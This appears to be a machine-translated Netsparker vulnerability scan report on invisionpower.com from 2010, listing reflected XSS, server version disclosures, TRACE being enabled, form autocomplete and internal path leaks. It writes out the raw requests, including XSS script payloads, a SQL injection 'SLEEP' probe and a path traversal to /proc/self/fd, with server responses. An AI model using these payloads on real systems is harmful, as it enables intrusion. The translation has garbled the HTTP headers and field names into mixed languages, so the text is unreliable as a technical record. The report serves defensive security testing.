query-based	QUERY STRING	'"--><script>Alarma(0x000631)</script>

query

GET /index.php?'"--><script>netsparker(0x000631)</script> HTTP/1.1
Ver: https://www.invisionpower.com/customer/
User Agent: Mozilla/4.0 (supported; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Hidden control: hidden sin
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept encoding: gzip, deflate

answers

HTTP/1.1 200 Aceptar
Date: Wednesday, September 22, 2010 22:33:20 GMT
Servidor: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
Powered by X: PHP/5.3.2
Cache control: no cache, must revalidate, max-age=0
Expires: Monday, Jul 26, 1997 05:00:00 GMT
Pragma: no-cache
Content encoding:
Vary: accept encoding
Content length: 3058
Content type: text/html

document.getElementById( 'li_' + _id ).className = 'selecionado';
</script>
</div>
<div id='header'>
<h1>Invision Power Services, Inc.</h1>
</div>

<li><a href="http://forums.invisionpower.com" title="">Unternehmensforen</a></li>

<li>

<a href="http://www.invisionpower.com/customer/index.html" title="">Kundenbereich</a>

<div class='side_box'>
<h5>Call us</h5>
If you have any questions, feel free to contact us!<br /><br />

<span class='tel_no'>+1 804-200-5695</span><br />
<span class='tel_info'>outside the US</span><br /> <br />
</div>

</div>

- /index.php

/index.phpCONFIRMED

https://www.invisionpower.com/index.php?'"--><script>alerta(0x000B5B)</script>

Parameter

Parameter	model	courage
application component	TAKE IT	bill
Module	TAKE IT	order assistant
Section	TAKE IT	query
model	TAKE IT	PACKAGES
HostOpt	TAKE IT	1
host type	TAKE IT	community
List	TAKE IT	201
query-based	QUERY STRING	'"--><script>alerta(0x000B5B)</script>

query

GET /index.php?'"--><script>netsparker(0x000B5B)</script> HTTP/1.1
See: http://www.invisionpower.com/hosting/select_package.php
User Agent: Mozilla/4.0 (supported; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Hidden control: hidden sin
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept encoding: gzip, deflate

answers

HTTP/1.1 200 Aceptar
Date: Wednesday, September 22, 2010 22:41:33 GMT
Servidor: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
Powered by X: PHP/5.3.2
Cache control: no cache, must revalidate, max-age=0
Expires: Monday, Jul 26, 1997 05:00:00 GMT
Pragma: no-cache
Content encoding:
Vary: accept encoding
Content length: 3058
connection: close
Content type: text/html

document.getElementById( 'li_' + _id ).className = 'selecionado';
</script>
</div>
<div id='header'>
<h1>Invision Power Services, Inc.</h1>
</div>

<li><a href="http://forums.invisionpower.com" title="">Unternehmensforen</a></li>

<li>

<a href="http://www.invisionpower.com/customer/index.html" title="">Kundenbereich</a>

<div class='side_box'>
<h5>Call us</h5>
If you have any questions, feel free to contact us!<br /><br />

<span class='tel_no'>+1 804-200-5695</span><br />
<span class='tel_info'>outside the US</span><br /> <br />
</div>

</div>

- /index.php

/index.phpCONFIRMED

https://www.invisionpower.com/index.php?'"--><script>alerta(0x000BFC)</script>

Parameter

Parameter	model	courage
application component	TAKE IT	basic
Module	TAKE IT	assignment
query-based	QUERY STRING	'"--><script>Alarma (0x000BFC)</script>

query

GET /index.php?'"--><script>netsparker(0x000BFC)</script> HTTP/1.1
See: https://www.invisionpower.com/index.php?appcomponent=billing&module=order_wizard&section=order&type=packages&list=209
User Agent: Mozilla/4.0 (supported; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Hidden control: hidden sin
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept encoding: gzip, deflate

answers

HTTP/1.1 200 Aceptar
Date: Wednesday, September 22, 2010 22:41:51 GMT
Servidor: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
Powered by X: PHP/5.3.2
Cache control: no cache, must revalidate, max-age=0
Expires: Monday, Jul 26, 1997 05:00:00 GMT
Pragma: no-cache
Content encoding:
Vary: accept encoding
Content length: 3059
connection: close
Content type: text/html

document.getElementById( 'li_' + _id ).className = 'selecionado';
</script>
</div>
<div id='header'>
<h1>Invision Power Services, Inc.</h1>
</div>

<li><a href="http://forums.invisionpower.com" title="">Unternehmensforen</a></li>

<li>

<a href="http://www.invisionpower.com/customer/index.html" title="">Kundenbereich</a>

<div class='side_box'>
<h5>Call us</h5>
If you have any questions, feel free to contact us!<br /><br />

<span class='tel_no'>+1 804-200-5695</span><br />
<span class='tel_info'>outside the US</span><br /> <br />
</div>

</div>

- /index.php

/index.phpCONFIRMED

https://www.invisionpower.com/index.php?'"--><script>alerta(0x000C4D)</script>

Parameter

Parameter	model	courage
	TAKE IT
application component	TAKE IT	bill
Module	TAKE IT	order assistant
disapproval gesture	TAKE IT	paso 2
query-based	QUERY STRING	'"--><script>alerta(0x000C4D)</script>

query

GET /index.php?'"--><script>netsparker(0x000C4D)</script> HTTP/1.1
See: https://www.invisionpower.com/index.php?appcomponent=billing&module=order_wizard&section=order&type=packages&list=209
User Agent: Mozilla/4.0 (supported; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Hidden control: hidden sin
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept encoding: gzip, deflate

answers

HTTP/1.1 200 Aceptar
Date: Wednesday, September 22, 2010 22:42:08 GMT
Servidor: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
Powered by X: PHP/5.3.2
Cache control: no cache, must revalidate, max-age=0
Expires: Monday, Jul 26, 1997 05:00:00 GMT
Pragma: no-cache
Content encoding:
Vary: accept encoding
Content length: 3058
connection: close
Content type: text/html

document.getElementById( 'li_' + _id ).className = 'selecionado';
</script>
</div>
<div id='header'>
<h1>Invision Power Services, Inc.</h1>
</div>

<li><a href="http://forums.invisionpower.com" title="">Unternehmensforen</a></li>

<li>

<a href="http://www.invisionpower.com/customer/index.html" title="">Kundenbereich</a>

<div class='side_box'>
<h5>Call us</h5>
If you have any questions, feel free to contact us!<br /><br />

<span class='tel_no'>+1 804-200-5695</span><br />
<span class='tel_info'>outside the US</span><br /> <br />
</div>

</div>

autocomplete enabled

1 TOTAL

LOW

CONFIRMED

Autocomplete has been enabled for one or more of the form fields. These were either "password" fields or important fields like "credit card".

influence

The data entered in these fields is cached by the browser. An attacker who can access the victim's browser can steal this information. This is especially important if the app is frequently used on shared computers, e.g. B. in Internet cafes or airport terminals.

add attributeautocomplete="off"for the form label or for individual "input" fields.

Actions to take

See the remedy for the solution.
Find all input instances that store private data and disable auto completion. Fields containing data such as "credit card" or "CCV" should not be cached. You can allow the app to cache usernames and remember passwords, but in most cases this is not recommended.
After fixing the identified issues, check the app again to make sure all fixes have been applied correctly.

Skills Required for Successful Exploration

Dumping all the data from a browser can be quite easy and there are several automated tools to do this. If the attacker is unable to dump the data, they can still browse recently visited websites and enable autocomplete to display previously entered values.

external references

Using autocomplete in HTML forms

- /ccs_forums_install/admin/

/ccs_forums_install/admin/CONFIRMED

http://www.invisionpower.com/ccs_forums_install/admin/

Identified field name

clave

query

answers

Apache version disclosure

1 TOTAL

LOW

Netsparker has determined that the target web server is an Apache server. This was exposed via the HTTP response. This information can help an attacker better understand the systems in use and potentially design new attacks that target the specific version of Apache.

influence

An attacker could look for vulnerabilities specific to the Apache version identified in the SERVER header.

Configure your web server to prevent information from theSERVERHeader of your HTTP response.

- /Financial assets/

/Financial assets/

http://www.invisionpower.com/assets/

extracted version

Servidor: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2

query

GET /assets/HTTP/1.1
Ver: http://www.invisionpower.com/assets//css/general.css
User Agent: Mozilla/4.0 (supported; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Hidden control: hidden sin
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept encoding: gzip, deflate
Connection: keep alive

answers

HTTP/1.1 403 Verboten
Date: Wednesday, September 22, 2010 22:16:22
Servidor: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
Content length: 57
Keep-Alive: timeout = 5, max = 100
Connection: keep alive
Content type: text/html; Character set = iso-8859-1

<h1>Invision Power Services</h1>Acceso denegado. <i>403</i>

PHP version disclosure

1 TOTAL

LOW

Netsparker has detected that the target web server advertises the PHP version used via the HTTP response. This information can help an attacker gain a better understanding of the systems in use and potentially design new attacks that target the specific version of PHP.

influence

An attacker could look for specific vulnerabilities in the identified version. Also, the attacker could use this information in conjunction with other vulnerabilities in the application or web server.

- /Financial assets/

/Financial assets/

http://www.invisionpower.com/assets/

extracted version

Servidor: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2

query

answers

<h1>Invision Power Services</h1>Acceso denegado. <i>403</i>

Release of the OpenSSL version

1 TOTAL

LOW

Netsparker detected that the target web server advertises the OpenSSL version in the HTTP response. This information can help an attacker design new attacks, and the system can also become an easier target for automated attacks.

influence

Configure your web server to prevent information from theSERVERHeader of your HTTP response.

- /Financial assets/

/Financial assets/

http://www.invisionpower.com/assets/

extracted version

Servidor: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2

query

answers

<h1>Invision Power Services</h1>Acceso denegado. <i>403</i>

Apache module version disclosure

1 TOTAL

LOW

Netsparker detected that the target web server advertises one of the Apache module versions. This was exposed via the HTTP response. This information can help an attacker better understand the systems in use and potentially design new attacks that target the specific version of Apache.

influence

An attacker could search for specific vulnerabilities in the identified version of the Apache module. The attacker could also use this information in conjunction with other vulnerabilities in the application or web server.

Configure your web server to prevent information from theSERVERHeader of your HTTP response.

- /Financial assets/

/Financial assets/

http://www.invisionpower.com/assets/

extracted version

Servidor: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2

query

answers

<h1>Invision Power Services</h1>Acceso denegado. <i>403</i>

FOLLOW-UP / FOLLOW-UP Identified

1 TOTAL

LOW

CONFIRMED

Netsparker determined that the TRACE/TRACK method is allowed.

influence

If the application is vulnerable to cross-site scripting and uses HTTP-only cookies, an attacker could bypass the HTTP-only cookie limitation and read the cookies in an XSS attack.

Disable this method on all production systems. Although the application is not vulnerable to cross-site scripting, a debugging feature such as TRACE/TRACK should not be needed on a production system and should therefore be disabled.

external references

- /index.php

/index.phpCONFIRMED

https://www.invisionpower.com/index.php

query

RASTREO /index.php HTTP/1.1
User Agent: Mozilla/4.0 (supported; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Hidden control: hidden sin
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept encoding: gzip, deflate

answers

HTTP/1.1 200 Aceptar
Date: Wednesday, September 22, 2010 22:16:22
Servidor: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
Powered by X: PHP/5.3.2
Establecer-Cookie: session_id=f018738443286a79b19a7c920cbda3ef; camino=/; httpssomente
Cache control: no cache, needs to be revalidated, max age = 0
Expires: Tuesday, September 21, 2010 22:16:22 GMT
Pragma: no-cache
Content encoding:
Vary: accept encoding
Content length: 4223
connection: close
Content-type: text/html;charset=UTF-8

</ul>
</div>
</div>
<script type='text/javascript'>
var ticker = new ips.ticker ($('ticker'), {duración: 4});
</script>

<div style='width: 280px; move the cursor to the right; left border: 1px solid #dedede; padding links: 20px;'>
<h2 class='cufon'>New Blogs</h2>

</div>

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-2199880-1']);
_gaq.push(['_trackPageview']);

</script>
<img src='/ccs_forums_install/index.php?app=core&module=task' alt='' style='border: 0px;height:1px;width:1px;' /></cuerpo>
</html>

prohibited resource

1 TOTAL

TRAINING

CONFIRMED

The web server denied access to this resource. This is generally not a security issue and is reported here for informational purposes.

influence

This issue has no impact.

- /Financial assets/

/Financial assets/CONFIRMED

http://www.invisionpower.com/assets/

query

answers

<h1>Invision Power Services</h1>Acceso denegado. <i>403</i>

Email Address Disclosure

1 TOTAL

TRAINING

Netsparker found email addresses on the website.

influence

Email addresses detected in the app can be used by spam engines as well as brute force tools. Also, valid email addresses can lead to social engineering attacks.

Use generic email addresses such as contact@ or info@ for general communications, remove specific email addresses of website users/persons when necessary, and use submission forms for this purpose.

external references

Wikipedia - Email Spam

- /empresa/padrones.php

/empresa/padrones.php

http://www.invisionpower.com/company/standards.php

emails found

info@invisionpower.com

query

GET /empresa/padrones.php HTTP/1.1
Ver: https://www.invisionpower.com/
User Agent: Mozilla/4.0 (supported; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Hidden control: hidden sin
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept encoding: gzip, deflate

answers

HTTP/1.1 200 Aceptar
Date: Wednesday, September 22, 2010 22:16:38 GMT
Servidor: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
Powered by X: PHP/5.3.2
Establecer-Cookie: session_id=8be672ec47505079997ee85f995eb752; camino=/; httpssomente
Cache control: no cache, needs to be revalidated, max age = 0
Expires: Tuesday, September 21, 2010 22:16:38 GMT
Pragma: no-cache
Content encoding:
Vary: accept encoding
Content Length: 7431
Content-type: text/html;charset=UTF-8

<!DOCTYPEhtml
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="es" lang="es" xmlns="http://www.w3.org/1999/xhtml">
<Kopf>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<title>IPS-Dienststandards</title>
<meta name='description' content='Our service standards define what you can expect from us when you purchase our products or services.' /><link rel='canonical' href='http://www.invisionpower.com/company/standards.php' />
<link rel="stylesheet" type="text/css" media="screen" href="http://www.invisionpower.com/assets//css/general.css" />
<enlace rel='hoja de estilo' type='text/css' media='screen' href='http://www.invisionpower.com/assets/css/misc.css' />
<script type='text/javascript'>
jsDebug = true;
</script>

ips.delegate.initialize();
</script>
</head>
<body>
<div id='header'>
<div id='header'>
<a href='http://www.invisionpower.com' title='Página de inicio de IPS, Inc.' id='branding'><img src='http://www.invisionpower.com/assets//images/ logotipo.png' alt='Logotipo' /></a>
</div>
</div>
<div id='external_container'>
<div id=''>
<ul id='main_navigation'>
<li id='nav_products' class='ausgewählt'>
<a href='http://www.invisionpower.com/suite/'>Unsere Suite</a>
<ul id='nav_products_menu' class='main_menu'>
<li><a href='http://www.invisionpower.com/suite/' title='Ein Plataforma IPS'>Ein Plataforma IPS</a></li>
<li><a href='http://www.invisionpower.com/products/' title='See all products'>Produktlinie</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/board/' title='IP.Board Forum Software'>IP.Board</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/blog/' title='Ir para IP.Blog'>IP.Blog</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/gallery/' title='Ir para IP.Gallery'>IP.Gallery</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/content/' title='Ir para IP.Content'>IP.Content</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/chat/' title='Ir para IP.Chat'>IP.Chat</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/downloads/' title='Ir para IP.Downloads'>IP.Downloads</a></li>

<li class='sep'><a href='http://www.invisionpower.com/products/spammonitor/' title='Ir a Spam Monitor'>Spam-Überwachung</a></li>
<li><a href='http://www.invisionpower.com/suite/iphone' title='Go to iPhone App'>iPhone App</a></li>
<li><a href='http://www.invisionpower.com/suite/convert.php' title='IPS Software Converter'>IPS Converter</a></li>
<li><a href='http://www.invisionpower.com/suite/requirements.php' title='Suite-Anforderungen'>Suite-Anforderungen</a></li>
<li><a href='http://www.invisionpower.com/suite/demo.php' title='Try our products'>Try our suite for free</a></li>

</ul>
<script type='text/javascript'>
ips.menus['produtos'] = new ips.menu( $('nav_products'), $('nav_products_menu') );
</script>
</li>
<li id='nav_hosted'>
<a href='/hosting'>Gehostete Communities</a>
<ul id='nav_hosted_menu' class='main_menu'>
<li><a href='http://www.invisionpower.com/hosting/' title='Go to Default Packages'>Standard Package</a></li>
<li><a href='http://www.invisionpower.com/hosting/advanced.php' title='Go to Advanced Packages'>Advanced Packages</a></li>
</ul>
<script type='text/javascript'>
ips.menus['hosted'] = new ips.menu( $('nav_hosted'), $('nav_hosted_menu') );
</script>
</li>
<li id='navigation_services'>
<a href='http://www.invisionpower.com/services/' title='Go to our services overview'>Services</a>
</li>
<li id='nav_support'>
<a href='#'>Support</a>
<ul id='nav_support_menu' class='main_menu'>
<li><a href='http://community.invisionpower.com/resources/documentation/index.html' title='Documentación'> Documentación </a></li>
<li><a href='/cliente/' title='Go to Client Area'>Customer Area</a></li>
<li><a href='http://community.invisionpower.com/index.php?app=ccs' title='Ir al sitio de recursos'>Ressourcen</a></li>
<li><a href='http://community.invisionpower.com' title='Unsere Community-Support-Foren'>Support-Foren</a></li>

<li><a href='http://www.invisionpower.com/company/faq.php' title='Go to FAQ'>Häufig gestellte Fragen</a></li>
<li><a href='http://www.invisionpower.com/hosting/status.php' title=''>Rückstellungsstatus</a></li>
</ul>
<script type='text/javascript'>
ips.menus['support'] = new ips.menu( $('support_nav'), $('support_nav_menu') );
</script>
</li>
<li id='nav_tienda'>
<a href='http://www.invisionpower.com/store/' title='Ir a la tienda'>Tienda</a>
</li>
<li id='nav_community'>
<a href='http://community.invisionpower.com/' title='Visit our own community'>Our community</a>
</li>
<li id='nav_contact'><a href='http://www.invisionpower.com/company/contact.php' title='Entre em contato'>Falle conosco »</a></li>
</ul>
</div>
<div id='container'>

<div id='page_standards'>
<div id='standards_header' class='page_header small'>
<h1>Service standards</h1>
</div>
<br /><br />
<p class='generic size 16'>
We publish our service standards as FAQs in plain, easy-to-read English about how, why and what our customer service is for and what you can expect from us when you purchase our products or services.
</p>

<br /><br />
<div class='policy_menu'>
<h2 class='cufon'>Inhalar</h2>
<ul class='bullets' style='margin-left: 20px'>
<li><a href='#payment' title='Payment'>Payment</a></li>
<li><a href='#hoo' title='Opening hours'>Opening hours</a></li>
<li><a href='#hes' title='IPS Hosting Emergency Support'>IPS Hosting Emergency Support</a></li>
<li><a href='#ta' title='Telefonhilfe'>Telefonhilfe</a></li>
<li><a href='#tr' title='Ticket Responses'>Ticket Responses</a></li>
<li><a href='#ipb' title='IP.Board License Terms'>IP.Board License Terms</a></li>
<li><a href='#forums' title='Corporate Forums'>Corporate Forums</a></li>
<li><a href='#license' title='Softwarelizenz'>Softwarelizenz</a></li>

</ul>

<br /><br />
<h2 class='cufon'>More information</h2>
<p class='generic size13'>
If you have any questions that are not answered here, please feel free to contact us.<br /><br />
<a href='http://www.invisionpower.com/company/contact.php' title='Contate-nos'>Falle conosco →</a>
</p>
</div>

<div class='policy'>
<a id='Respect'></a>
<h2>Payment</h2>
<p class='generic size13'>
We accept Visa, MasterCard, American Express and Discover credit cards. We also accept PayPal, UK debit cards (Delta, Maestro/Switch, Solo, Electron) and US, UK, Canadian or Australian checks or postal orders.<br /><br />

We verify all orders to protect you and us from fraudulent transactions. This means that sometimes there may be a delay in processing your order (up to 1 business day), but please allow one hour for activation during business hours. Feel free to contact customer service to find out the status of your order.<br /><br />

It is our policy to refuse refunds for software once our technicians have downloaded and/or installed it for you. Please use our demo systems or contact our sales department if you have any questions about product or service performance prior to purchase.<br /><br />

Payment terms are net 5.

<br /><br />
<a id='hoo'></a>
<h2>Opening hours</h2>
<p class='generic size13'>
Our opening hours are always indicated on the contact page. Phone support is only available during business hours. While we respond to support tickets outside of business hours, certain types of inquiries, such as billing, customer service, and extended support, are examples of issues that may require enhanced services that are only available during business hours. IPS Hosting customers have the option to receive emergency support after hours if their website is not responding.
</p>

<br /><br />
<a id='is'></a>
<h2>Emergency IPS Hosting Support</h2>
<p class='generic size13'>
Our systems team is staffed 24 hours a day, 7 days a week, 365 days a year, but we only answer general technical support questions during normal business hours. If you are an IPS Hosting customer and your website is offline at any time outside of business hours, you can always submit an emergency support request which will immediately send a message to our after-hours technicians. We also offer 24 hour emergency phone support when your website is offline to notify our team when your website is offline. Fees may apply for using this hotline when your website is live or for non-hosting issues.
</p>

<br /><br />
<a id='ta'></a>
<h2>Phone support</h2>
<p class='generic size13'>
Not all IPS software or services include telephone support. Be sure to check your purchase description to see if phone support is included.
</p>

<br /><br />
<a id='tr'></a>
<h2>Ticket responses</h2>
<p class='generic size13'>
Our average response time is less than two hours, but depending on the nature of your inquiry, it may take up to two business days to resolve your issue. Our technicians will inform you about the status of your request.<br /><br />

You can view your existing tickets at any time to see the progress of your request or which department your ticket has been assigned to. After a ticket has existed for 48 hours, you can use the management escalation feature to flag your ticket for management review if the issue isn't resolved correctly. Billing, customer service, and special requests are only processed during business hours.<br /><br />
IPS does not support software modifications. If a mod you installed causes problems, our only solution is to go back to the unmodified files.<br /><br />

In certain circumstances, problems at the server level prevent our software from working properly. IPS cannot make any adjustments to your server's hosting environment to bring it up to the normal environment used by most hosting providers.<br /><br />

Often our team needs access to the community manager or server file system to diagnose a support issue. If you are unable or unwilling to grant this access: Support is limited or unavailable.
</p>

<br /><br />
<a id='ipb'></a>
<h2>IP.Board License Terms</h2>
<p class='generic size13'>
Both the IP.Board standard and the commercial license terms give you access to software updates for the first six months of your license. If after six months you decide not to renew at the listed prices, your software will continue to work, but you will lose access to updates and technical support. Please note that security patches will be made available to all customers whenever possible, even if you choose not to renew your service.<br /><br />

If you renew your standard license after the first six months, the renewal includes updates and ticket support, but not phone support renewal. If you need phone support for a standard license after the 30-day induction, you can purchase an extension or upgrade to a commercial license through our sales department.
</p>

<br /><br />
<a id='Foreigner'></a>
<h2>Corporate forums</h2>
<p class='generic size13'>
Our corporate forums are a convenient place for customers to interact. It is important to note that forums are not part of customer service, just an added benefit and access may be removed. From time to time, we may be required to remove an account's access to the Company Forums if someone makes posts that prevent others from accessing the Forums.
</p>

<br /><br />
<a id='License'></a>
<h2>Softwareizenz</h2>
<p class='generic size13'>
Invision Power Services, Inc.
<br /> Power board Invision Software
<br /> End-user license agreement
<br />
<br /> <b>LICENCIA</b>
<br /> Invision Power Services (IPS) grants you a non-exclusive license to use the Software in a facility accessible via a URL (web address), subject to the terms of any Section of this Agreement.
<br />
<br /> <b>PRAZO</b>
<br /> The Invision Power Board is offered under exclusive license terms that vary depending on your purchasing decision. All license terms allow you to run your currently installed copy of the software without renewals or additional fees. Additional charges apply for extended technical support and additional services, which vary depending on the license type selected at the time of purchase.
<br />
<br /> <b>SCOPE OF THE CONCESSION</b>
<br />
<br /> <i>You can: </i>
<br /> - Customize the design and operation of the Software to suit the internal needs of your website, except to the extent not permitted in this Agreement.
<br /> - Create and distribute mod instructions, skin packs or language packs, provided they include an indication that the skins and language packs were originally exported and created by the Invision Power Board and/or IPS. Modification instructions that you personally create are not the property of IPS unless they contain proprietary Invision Power Board coding.
<br /> - create applications that interact with the operation of the Software, provided that such application is an original work
<br />
<br /> <i>You cannot:</i>
<br /> - allow other people to use the software, except under the conditions listed above
<br /> - Reverse engineer, disassemble, or create derivative works based on the Software for distribution or use outside of your website
<br /> - Use the Software in any way that condones or encourages terrorism, promotes or provides pirated software, or any other form of illegal or harmful activity
<br /> - Change and/or remove any copyright notices or labels in the software on each page (unless a license to remove copyright output has been purchased) and in the header of each source file script
<br /> - distribute the software
<br /> - Distribute individual copies of files, libraries, or other programming material in the software package
<br /> - distribute or modify any copyrighted graphics, HTML or CSS included with the Software for use in any non-Invision Power Board software application or website without the written permission of IPS
<br /> - modify the Software to run in more than one instance or location (URL, domain, subdomain, etc.) from a single set of source program files, unless each location is licensed separately
<br />
<b>DISCLAIMER OF LIABILITY</b>
<br /> The software is provided "AS IS" without warranty of any kind, including, but not limited to, the warranties of merchantability, fitness for a particular purpose, and non-infringement. All risk as to the quality and performance of the...

[Possible] Internal path leak (*nix)

2 in all

TRAINING

Netsparker identified an internal path in the document.

influence

There is no direct impact, but this information could help an attacker while exploiting certain other vulnerabilities.

Error messages must be disabled.
Remove this private data type from the output.

external references

OWASP Full Path Disclosure

- /index.php

/index.php

https://www.invisionpower.com/index.php?appcomponent=SELECT%20SLEEP(25)--+&module=order_wizard&secti..

Internal routes identified

/home/invision/public_html/admin/fuentes/.php
/home/invision/public_html/index.php

query

GET /index.php?appcomponent=SELECT%20SLEEP(25)--+&module=order_wizard&section=order&type=packages&list=209 HTTP/1.1
See: http://www.invisionpower.com/hosting/advanced.php
User Agent: Mozilla/4.0 (supported; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Hidden control: hidden sin
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept encoding: gzip, deflate
Connection: keep alive

answers

HTTP/1.1 200 Aceptar
Date: Wednesday, September 22, 2010 22:32:35 GMT
Servidor: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
Powered by X: PHP/5.3.2
Content Length: 251
connection: close
Content type: text/html

<br /><b>Advertencia</b>: require(/home/invision/public_html/admin/sources/.php) [<a href='function.require'>function.require</a>]: error Open Stream: no existe tal archivo o directorio en <b>/home/invision/public_html/index.php</b> en la línea <b>607</b><br />

- /ccs_forums_install/admin/index.php

/ccs_forums_install/admin/index.php

http://www.invisionpower.com/ccs_forums_install/admin/index.php?adsess=../../../../../../CANTBERE/..

Internal routes identified

/proc/self/fd/2&
/proc/self/fd/2&app

query

GET /ccs_forums_install/admin/index.php?adsess=../../../../../../CANTBEHERE/../../../../proc/self/fd/ 2 and HTTP/1.1
See: https://www.invisionpower.com/ccs_forums_install/admin/
User Agent: Mozilla/4.0 (supported; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Hidden control: hidden sin
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept encoding: gzip, deflate
Connection: keep alive

answers

HTTP/1.1 200 Aceptar
Date: Wednesday, September 22, 2010 22:37:35 GMT
Servidor: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
Powered by X: PHP/5.3.2
Content Length: 4822
Keep-Alive: timeout = 5, max = 54
Connection: keep alive
Content type: text/html

<!DOCTYPE html PÚBLICO "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang= "en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="tipo-de-contenido" content="text/html; charset=UTF -8" /><meta http-equiv="Pragma" content="sem-cache" /><meta http-equiv="Cache-Control" content="sem-cache" /><meta http-equiv=" Expira" content="Sexo, 01 de enero de 1999 01:00:00 GMT" /><link rel="icono de acceso directo" href='http://www.invisionpower.com/ccs_forums_install/favicon.ico' /> < title >Invision Power Board: Fassadenanmeldung</title><script type='text/javascript'>jsDebug = 1;USE_RTE = 0;isRTL= false;</script><link rel="stylesheet" type="text /css " media='screen' href="http://www.invisionpower.com/ccs_forums_install/public/min/index.php?f=admin/skin_cp/acp.css,admin/skin_cp/acp_content.css,admin /skin_cp /acp_editor.css"><script type='text/javascript' src='http://www.invisionpower.com/ccs_forums_install/public/min/index. php ?g=js'></script <script type='text/javascript' src='http://www.invisionpower.com/ccs_forums_install/public/min/index.php?f=public/js/ipb. js, admin/js/acp.js, admin/js/acp.menu.js, admin/js/acp.livesearch.js, admin/js/acp.styles.js, admin/js/acp.tabs.js' > </script><!-- <script type='text/javascript' src='http://getfirebug.com/releases/lite/1.2/firebug-lite-compressed.js'></script>-- > <script type='text/javascript' language='javascript'>Loader.boot();</script><script type='text/javascript' src='http://www.invisionpower.com/ccs_forums_install/ administrador /js/acp.help.js '></script><script type='text/javascript' language='javascript'>//<![CDATA[ipb.vars['st']= "";ipb . vars['base_url']= " http://www.invisionpower.com/ccs_forums_install/admin/index.php?adsess=../../../../../../CANTBHERE/.. /../../. ./proc/self/fd/2&";ipb.vars['front_url']= "http://www.invisionpower.com/ccs_forums_install/ind ex.php?";ipb. vars['app_url']= " http://www.invisionpower.com/ccs_forums_install/admin/index.php?adsess=../../../../.. /../CANTBERE/.. /../../. ./proc/self/fd/2&app=core&";ipb.vars['image_url'] = "http://www.invisionpower.com/ccs_forums_install /admin/skin_cp/images/" ;ipb.vars['md5_hash' ]= "";/* ---- Cookies ----- */ipb.vars['cookie_id'] = '';ipb.vars ['cookie_domain'] = '' ;ipb.vars['cookie_path' ]= '';ipb.templates['close_popup']= "<img src='http://www.invisionpower.com/ccs_forums_install/public/style_images/master/close_popup.png' alt='x' />" ;ipb.templates['page_jump']= new Template("<div id='#{id}_wrap' class='ipbmenu_content'><h3 class ='bar'>Ir para a página</h3><input type ='text' 